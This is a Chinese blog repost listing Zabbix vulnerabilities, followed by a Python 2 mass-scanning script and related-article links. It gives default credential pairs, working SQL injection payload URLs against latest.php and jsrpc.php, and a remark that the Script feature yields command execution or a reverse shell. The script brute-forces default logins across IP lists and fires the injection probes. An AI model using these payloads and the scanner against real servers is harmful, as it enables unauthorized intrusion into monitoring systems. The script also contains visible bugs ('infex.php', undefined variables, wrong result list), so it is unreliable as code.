Zabbix漏洞汇总

最新推荐文章于 2024-07-17 15:24:36 发布
最新推荐文章于 2024-07-17 15:24:36 发布
阅读量1.4k 收藏 1
点赞数
文章标签: 运维 php python
原文链接:http://www.cnblogs.com/KevinGeorge/p/8268072.html
版权

一、zabbix:

zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

二、Zabbix漏洞:

1、弱口令:

1 WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]

2、SQL注入

(1)

标题:latest.php处toogle_ids[]参数SQL注入

攻击条件:登陆后

危害:可获取系统权限

URL以及payload:

1 """
2 http://a.b.c.d/latest.php?output=ajax&sid=登录后的sessionid的后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
3 """

(2)

标题:jsrpc.php处profileIdx2参数SQL注入

攻击条件:无需登录,亦可以登录后使用高权限的sid、cookie进行替换

危害:一般SQL注入危害

URL以及payload:

1 """
2 http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
3 """

(3)

标题:其他SQL注入漏洞:chart_bar.php处itemid参数和periods参数SQL注入;httpmon.php处applications参数SQL注入

攻击条件:不详

危害:不详

URL以及payload:一般SQL注入payload尝试

3、OS命令注入执行:

(1)弱口令登录后,使用zabbix自带的Script执行系统命令可以反弹shell等等

(2)防御:

  #不要设置AllowRoot=1,避免agent和server以root权限启动。

  #进制agent执行system.run,不要设置EnableRemoteCommands=1。

     #即使打补丁。

4、自己写的一个python检查脚本:有问题及时喷我

  1 #!/usr/bin/env python
  2 # -*- coding:utf-8 -*-
  3 """
  4 This Python Script Is For "Zabbix" VulnScan!
  5 Author:ChenRan
  6 Company:360.net
  7 """
  8 
  9 # import lib files
 10 import os
 11 import sys
 12 import time
 13 import logging
 14 import datetime
 15 import requests
 16 import threading
 17 from bs4 import BeautifulSoup
 18 from optparse import OptionParser
 19 
 20 #global varites define
 21 ZabbixTarget = None#target ip address!
 22 ZabbixFile = None#target ip address file
 23 BlackList = [
 24     'incorrect',
 25     '<!-- Login Form -->'
 26 ]
 27 
 28 #global config set
 29 logging.basicConfig(level=logging.INFO,format='%(message)s')
 30 
 31 #global function defines:
 32 def Config_Init():
 33     """
 34     Take "http://" to the ip address to create targeturl!
 35     """
 36     global ZabbixTarget
 37     global ZabbixFile
 38     if ZabbixTarget != None:
 39         target = "http://%s"%ZabbixTarget
 40         return [target]
 41     elif ZabbixFile != None:
 42         targetlist = []
 43         with open(ZabbixFile,"r") as fr:
 44             for ip in fr.readlines():
 45                 ip = ip.split("\n")[0].split("\r")[0]
 46                 target = "http://%s"%str(ip)
 47                 targetlist.append(target)
 48         return targetlist
 49     else:
 50         return []
 51 
 52 def get_post_data(page_content):
 53     """
 54     from response html get post data! 
 55     """
 56     postdata = {}
 57     soup = BeautifulSoup(page_content, "html.parser")
 58     for inputparameter in soup.find_all('input'):
 59         if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
 60             postdata[inputparameter['name']] = inputparameter['value']
 61     return postdata
 62         
 63 def report_file_allinone():
 64     vulnlist = []
 65     scantime = str(datetime.datetime.now())
 66     for parents,dirs,filenames in os.walk("./"):
 67         for filename in filenames:
 68             if filename.find("zabbix_vulnscan_result") >= 0:
 69                 with open(filename,"r") as fr:
 70                     vulnlist.extend(fr.readlines())
 71                 os.remove(filename)
 72     with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw:
 73         fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
 74         for line in vulnlist:
 75             fw.write(line)
 76         
 77 #Zabbix Scan Class Defines
 78 class ZabbixScan:
 79     def __init__(self,targetlist):
 80         """
 81         #class column init!
 82         VulnExpPHPFile:
 83         //0-login-weakpassword
 84         //1-httpmon.php parameter->applicationos
 85         //2-chart_bar.php parameter->itemid
 86         //3-jsrpc.php parameter->profileIdx2
 87         //4-latest.php parameter->toggle_ids[]
 88         //5-OS_Injection->When you login the system you can run you scripts!
 89         TestTarget:
 90         //0-login-weakpassword
 91         //1-jsrpc.php
 92         //2-latest.php
 93         """
 94         self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary!
 95         self._targetlist = targetlist #wait for scan target!
 96         self._size = len(self._targetlist)#size of scan target!
 97         self._sqlinjectionurl1_vulnlist = []
 98         self._sqlinjectionurl2_vulnlist = []
 99         self._login_weakpassword_vulnlist = []
100         self._login_weakpassword_safelist = []
101         
102     def __del__(self):
103         del self._weakpassword
104         del self._targetlist
105         del self._size
106         del self._sqlinjectionurl1_vulnlist
107         del self._sqlinjectionurl2_vulnlist
108         del self._login_weakpassword_vulnlist
109         del self._login_weakpassword_safelist
110 
111     def __len__(self):
112         """return size of targetlist"""
113         return self._size
114     
115     def _scan_default_password_login(self):
116         for authinfo in self._weakpassword:
117             user = authinfo["username"]
118             pswd = authinfo["password"]
119             for target in self._targetlist:
120                 logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo)))
121                 headers = {
122                     'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
123                 }
124                 request = requests.session()
125                 try:
126                     response = request.get(target,headers=headers,timeout=3)
127                 except Exception,ex:
128                     self._login_weakpassword_safelist.append(target)
129                     continue
130                 if response.status_code != 200:
131                     self._login_weakpassword_safelist.append(target)
132                     continue
133                 postdata = get_post_data(response.content)
134                 headers["Referer"]=target
135                 postdata["user"] = user
136                 postdata["password"] = pswd
137                 try:
138                     response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3)
139                 except Exception,ex:
140                     self._login_weakpassword_safelist.append(target)
141                     continue
142                 if "chkbxRange.init();" in response.content:
143                     for flagstring in BlackList:
144                         if flagstring in response.content:
145                             self._login_weakpassword_safelist.append(target)
146                     self._login_weakpassword_vulnlist.append((target,user,pswd))
147                 else:
148                     self._login_weakpassword_safelist.append(target)
149                 request.close()
150     
151     def _sqlinjectionurl1_scan(self):
152         logging.info("[*] latest.php sqlinjection scan!")
153         for vulntarget in self._login_weakpassword_vulnlist:
154             target = vulntarget[0]
155             user = vulntarget[1]
156             pswd = vulntarget[2]
157             request = requests.session()
158             headers = {
159                 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
160             }
161             try:
162                 response = request.get(target,headers=headers,timeout=3)
163             except Exception,ex:
164                 continue
165             postdata = get_post_data(response.content)
166             postdata["user"] = user
167             postdata["password"] = pswd
168             headers["Referer"]=target
169             try:
170                 response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3)
171             except Exception,ex:
172                 continue
173             sessionid = response.cookie.values()[0][-16:]
174             scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid)
175             try:
176                 response = request.get(scanurl,timeout=20)
177             except Exception,ex:
178                 continue
179             if "SQL syntax" in repsonse:
180                 self._sqlinjectionurl1_vulnlist.append(vulntarget)
181             else:
182                 request.close()
183             
184     def _sqlinjectionurl2_scan(self):
185         logging.info("[*] jsrpc.php sqlinjection scan!")
186         for vulntarget in self._targetlist:
187             scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
188             headers = {
189                 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
190             }
191             try:
192                 response = request.get(url,headers=headers,timeout=20)
193             except Exception,ex:
194                 continue
195             if "ed733b8d10be255eceba344d533586" in response.content:
196                 self._sqlinjectionurl2_vulnlist.append(vulntarget)
197             else:
198                 pass
199     
200     def scan_run(self):
201         self._scan_default_password_login()
202         self._sqlinjectionurl1_scan()
203         self._sqlinjectionurl2_scan()
204     
205 class scanthread(threading.Thread):
206     def __init__(self,threadname,targetlist):
207         threading.Thread.__init__(self,name=threadname)
208         self.scanner = ZabbixScan(targetlist)
209         self.name = threadname
210         self.targetlist = targetlist
211     def _create_csv(self):
212         scantime = str(datetime.datetime.now())
213         with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw:
214             for vuln in self.scanner._login_weakpassword_vulnlist:
215                 target = vuln[0].split("http://")[-1]
216                 vulntype = "weakpassword"
217                 vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
218                 fw.write(vulnstring)
219             for vuln in self.scanner._sqlinjectionurl1_vulnlist:
220                 target = vuln[0].split("http://")[-1]
221                 vulntype = "latest.php-SQLI"
222                 vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
223                 fw.write(vulnstring)
224             for vuln in self.scanner._sqlinjectionurl1_vulnlist:
225                 target = target.split("http://")[-1]
226                 vulntype = "jsrpc.php-SQLI"
227                 vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
228                 fw.write(vulnstring)
229     def run(self):
230         #logging.info("[*] %s running!"%self.name)
231         #logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist)))
232         self.scanner.scan_run()
233         self._create_csv()
234         #logging.info("[*] %s finished!"%self.name)
235 
236 if __name__ == "__main__":
237     logging.info("[+]*****************************************************************[+]")
238     logging.info("Zabbix Scan Init!")
239     parser = OptionParser() 
240     parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!")
241     parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!")
242     parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!")
243     (options, args) = parser.parse_args()
244     parameterchecklist = [options.iptarget,options.iptargetfile]
245     if parameterchecklist in [[None,None],[None,""],["",None],["",""]]:
246         logging.error("[-] Target parameters error!")
247         exit(0)
248     try:
249         options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum)
250     except Exception,ex:
251         logging.error("[-] Threadnum parameter error!")
252         exit(0)
253     [ZabbixTarget,ZabbixFile] = parameterchecklist 
254     logging.info("[+] Scan Config Init!")
255     targetlist = Config_Init()
256     targetsize = len(targetlist)
257     logging.info("[+] Scan Target Number:%s"%str(targetsize))
258     logging.info("[+] Scan Threads Init")
259     threadtargetsize = targetsize/options.threadnum
260     devidestart = 0
261     devideend = threadtargetsize
262     threadlist = []
263     nameflag = 0
264     while True:
265         threadname = "scan-thread-%s"%str(nameflag)
266         nameflag += 1
267         if devideend < targetsize:
268             threadtargetlist = targetlist[devidestart:devideend]
269             threadlist.append(scanthread(threadname,threadtargetlist))
270             devidestart += threadtargetsize
271             devideend += threadtargetsize
272         elif devidestart <= targetsize:
273             threadtargetlist = targetlist[devidestart:]
274             threadlist.append(scanthread(threadname,threadtargetlist))
275             devidestart += threadtargetsize
276             devideend += threadtargetsize
277         else:
278             break
279         
280     logging.info("[+] Scan Thread Start!")
281     for thread in threadlist:
282         thread.start()
283         time.sleep(2)
284         logging.info("[+] %s --Start!"%thread.name)
285     for thread in threadlist:
286         thread.join()
287     logging.info("[+] Scan Finished!")
288     logging.info("[+] Report Creating!")
289     report_file_allinone()
290     logging.info("[+] Report Create!")
291     exit(0)
292     
293     
294

 

转载于:https://www.cnblogs.com/KevinGeorge/p/8268072.html

weixin_30883271
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞 (CVE-2016-10134)
qq_51577576的博客
08-14 3520
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
zabbix攻击学习
Shanfenglan's blog
12-01 2635
文章目录1. zabbix是什么2. Zabbix架构1. Zabbix Server2. Zabbix Agent3. Zabbix Proxy3. Zabbix Agent配置文件3.1 server3.2 ServerActive3.3 StartAgents3.4 EnableRemoteCommands3.5 AllowRoot3.6 UserParameter3.7 UnsafeUserParameters3.8 Include参数4. 攻击Zabbix Server1. 口令爆破2. mysq
zabbix漏洞总结
qq_45300786的博客
03-10 1725
github 维梓梓 https://blog.csdn.net/weixin_43571641/article/details/108317554 https://www.jianshu.com/p/43d86d7ed3a5 https://www.cnblogs.com/itworks/p/7159477.html https://www.cnblogs.com/echoonly/p/15210051.html https://blog.csdn.net/qq_43645782/article/deta
zabbix 漏洞收集总结
sojrs_sec的博客
12-31 2701
一: 弱口令/默认账号 admin:zabbix Admin:zabbix guest: 空 二: sql注入(ave-2016-10134) 版本 2.2.x 3.3.0-3.03 1 http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_s...
Zabbix漏洞总结
3569
01-24 5901
http://vinc.top/2017/04/18/zabbix%e6%bc%8f%e6%b4%9e%e6%80%bb%e7%bb%93/ 影响版本 1.8.5-1.8.9 利用前提 需要登录,默认口令 admin/zabbix或者是guest/空 使用Guest账户登录 报错注入 httpmon.php?applications=2 and (select 1 fro
软件漏洞Zabbix
qq_45883910的博客
02-12 4140
Zabbix 是什么? 免费的、企业级的分布式开源、C/S架构、监控众多网络参数和服务器的软件。 Zabbix基本原理 存在的漏洞Zabbix Server trapper命令注入漏洞(CVE-2020-11800) zabbix latest.php SQL注入漏洞(CVE-2016-10134) 漏洞原理。 Zabbix Server trapper命令注入漏洞(CVE-2020-11800) :在CVE-2017-2824中,其Server端 trapper command 功能存在一处代
漏洞复现】CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞
做自己喜欢的事,并将其发挥到极致!
02-25 5154
文章目录声明前言一、漏洞概述二、影响版本三、漏洞分析会话机制分析漏洞代码分析四、漏洞复现五、参考链接 声明 本篇文章仅用于技术学习和安全研究,切勿用于非授权下的测试行为,出现任何后果与本文章作者无关!!! 前言 Zabbix是全球流行的企业级开源监控解决方案。最近Zabbix官网爆出一则漏洞CVE-2022-23131 一、漏洞概述 Zabbix 是一个非常流行的开源监控平台,用于收集、集中和跟踪整个基础设施中的 CPU 负载和网络流量等指标。它与 Pandora FMS 和 Nagios 等解决
未授权访问漏洞汇总
weixin_46137328的博客
09-23 7480
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch未授权访问漏洞 Hadoop未授权访问漏洞 Jenkins未授权访问 MongoDB未授权访问 Zoo...
monitor-zabbix
weixin_52943021的博客
06-13 240
2. 事后录像查询,如果不法事件未能即使发现制作,可以调取录像,让不法分子无处遁形。1. 实时监测,即使你不在电脑前,也能实时掌握监控区域情况,提高工作效率。3. 给与不法分子震慑作用,当不法分子意识到自己暴露在监控内,就不敢使坏。4.远程查看,远程操控,只需要联网,即可在任何设备上,试试查看监控。我们的生活里,离不开监控,监控能够最大程度上,发挥如下作用。
zabbix6.4.6
08-30
Zabbix是一款开源的企业级监控解决方案,它能够监控各种网络参数以确保服务器、网络设备和应用程序的正常运行。在本文中,我们将深入探讨如何在CentOS 7系统上安装Zabbix 6.4.6,这是一个功能强大的版本,包含了丰富...
Zabbix6.0中文手册
04-13
Zabbix 6.0 中文手册 Zabbix 是一个企业级的监控解决方案,提供了强大的监控和自动化功能。以下是 Zabbix 6.0 中文手册的知识点总结: 1. 简介:Zabbix 是一个基于 Web 的网络监控系统,可以监控各种网络设备和...
zabbix监控山石防火墙
06-05
山石系列zabbix监控模板
zabbix监控的白皮书
05-22
Zabbix是一款广泛使用的开源网络监控解决方案,用于检测和管理IT基础设施的性能和状态。这份6.0版本的监控白皮书提供了全面的指导,详细介绍了Zabbix的功能和新特性,帮助用户更好地理解和利用该系统。 1. **简介**...
Nginx入门到精通五(动静分离)
一条大河
07-14 279
动静分离介绍Nginx动静分离是把动态请求和静态请求分开,而不能理解为把动态页面和静态页面物理分离。可以理解为Nginx处理静态页面,Tomcat处理动态页面。动静分离实现上分为两种,方案1:主流方案,纯粹把静态文件独立成单独的域名,放在独立服务器上;方案2:动态文件和静态文件放在一起,通过Nginx来分开;通过location指定不同后缀名实现不同请求的转发;静态请求时,可以通过expires参数设置浏览器缓存过期时间,减少客户端和服务器之间的请求和流量。
分布式存储Ceph的部署及应用(创建MDS、RBD、RGW 接口)
weixin_44112402的博客
07-17 476
存储机制会把数据分散存储到多个节点上,具有高扩展性、高性能、高可用性等优点。Ceph使用C++语言开发,是一个开放、自我修复和自我管理的开源分布式存储系统。具有高扩展性、高性能、高可靠性的优点。Ceph目前已得到众多云计算厂商的支持并被广泛应用。RedHat及OpenStack,Kubernetes都可与Ceph整合以支持虚拟机镜像的后端存储。粗略估计,我国70%—80%的云平台都将Ceph作为底层的存储平台,由此可见Ceph俨然成为了开源云平台的标配。
CI/CD详解 & Jenkins 介绍与实战
my的博客
07-16 443
本文大纲概览: CI/CD 概念与工作流程 详解 Jenkins安装、启动、初始化配置 使用Jenkins部署github上的 xzll-im 微服务项目 freestyle方式 push代码后自动部署 pipeline方式部署 pipeline + push 方式 本文实操过程中,相关工具版本信息如下: centos版本: CentOS Linux release 7.9.200...
portainer教程-docker可视化管理工具
最新发布
chaoren499的专栏
07-17 253
很多朋友刚接触docker 学习,就想问 docker有图形化界面吗 ,答案是肯定的, 这里白眉大叔 给大家推荐 Docker可视化管理平台 -- Portainer。
DBA的Zabbix监控系统安装说明文档
09-06
DBA的Zabbix监控系统安装说明文档

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值